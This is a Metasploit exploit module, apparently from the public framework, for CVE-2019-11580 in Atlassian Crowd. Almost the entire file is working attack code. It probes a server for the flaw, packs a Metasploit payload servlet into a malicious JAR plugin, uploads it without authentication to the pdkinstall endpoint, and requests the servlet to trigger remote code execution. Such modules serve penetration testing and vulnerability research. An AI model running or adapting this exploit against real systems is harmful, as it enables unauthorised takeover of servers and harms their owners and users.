## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' => 'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE', 'Description' => %q{ This module can be used to upload a plugin on Atlassian Cloud via the pdkinstall development plugin as an unauthenticated attacker. The payload is uploaded as a JAR archive containing a servlet using a POST request to /crowd/admin/uploadplugin.action. The check command will check that the /crowd/admin/uploadplugin.action page exists and that it responds appropriately to determine if the target is vulnerable or not. }, 'Author' => [ 'Paul', # Vulnerability discovery 'Corben Leo', # PoC and Vulnerability Writeup. @hacker_ on Twitter. 'Grant Willcox' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2019-11580'], ['URL', 'https://jira.atlassian.com/browse/CWD-5388'], ['URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html'], ['URL', 'https://www.corben.io/atlassian-crowd-rce/'] ], 'Platform' => %w[java], 'Arch' => ARCH_JAVA, 'DefaultOptions' => { 'HttpClientTimeout' => 25 # Allow a bit more time for the file upload to complete, just in case things are delayed, before timing out. }, 'Notes' => { 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Targets' => [ [ 'Java Universal', { 'Arch' => ARCH_JAVA, 'Platform' => 'java' } ] ], 'DisclosureDate' => '2019-05-22' ) ) register_options( [ Opt::RPORT(8095), OptString.new('TARGETURI', [true, 'The base URI to Atlassian Crowd', '/crowd/']), ] ) end def upload_plugin(content) data = Rex::MIME::Message.new data.add_part(content, nil, 'binary', "form-data; name=\"file_#{Rex::Text.rand_text_alpha(8..12)}\"; filename=\"#{Rex::Text.rand_text_alpha(8..12)}.jar\"") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/admin/uploadplugin.action'), 'method' => 'POST', 'data' => data.to_s, 'ctype' => "multipart/mixed; boundary=#{data.bound}" }, datastore['HttpClientTimeout']) end def generate_plugin_jar name = Rex::Text.rand_text_alpha(8..12) servlet_name = Rex::Text.rand_text_alpha(8..12) atlassian_plugin_xml = %( <atlassian-plugin key="metasploit.PayloadServlet" name="#{name}" plugins-version="2" class="metasploit.PayloadServlet"> <plugin-info> <param name="atlassian-data-center-compatible">true</param> <description></description> <version>1.0.0</version> </plugin-info> <servlet name="#{servlet_name}" key="#{servlet_name}" class="metasploit.PayloadServlet"> <url-pattern>/#{name}</url-pattern> <description>#{Faker::App.name}</description> </servlet> </atlassian-plugin> ) # Generates .jar file for upload zip = payload.encoded_jar zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml) servlet = MetasploitPayloads.read('java', 'metasploit', 'PayloadServlet.class') zip.add_file('/metasploit/PayloadServlet.class', servlet) contents = zip.pack [contents, name] end def check print_status('Sending a test request to try installing an invalid plugin to see if the server is vulnerable...') res = upload_plugin(Rex::Text.rand_text_alpha(45..120)) if res.nil? CheckCode::Unknown('Was not able to connect to the target!') elsif (res.body =~ /Unable to install plugin/) && (res.code == 400) CheckCode::Vulnerable("Target responded that it couldn't install an invalid plugin, indicating it's vulnerable!") else CheckCode::Safe("Target didn't respond that it couldn't install an invalid plugin, so it's not vulnerable!") end end def exploit print_status('Generating a malicious JAR plugin...') content, plugin_name = generate_plugin_jar print_status('Uploading the malicious JAR plugin...') upload_plugin(content) send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "/plugins/servlet/#{plugin_name}"), 'method' => 'GET' }, datastore['HttpClientTimeout']) end end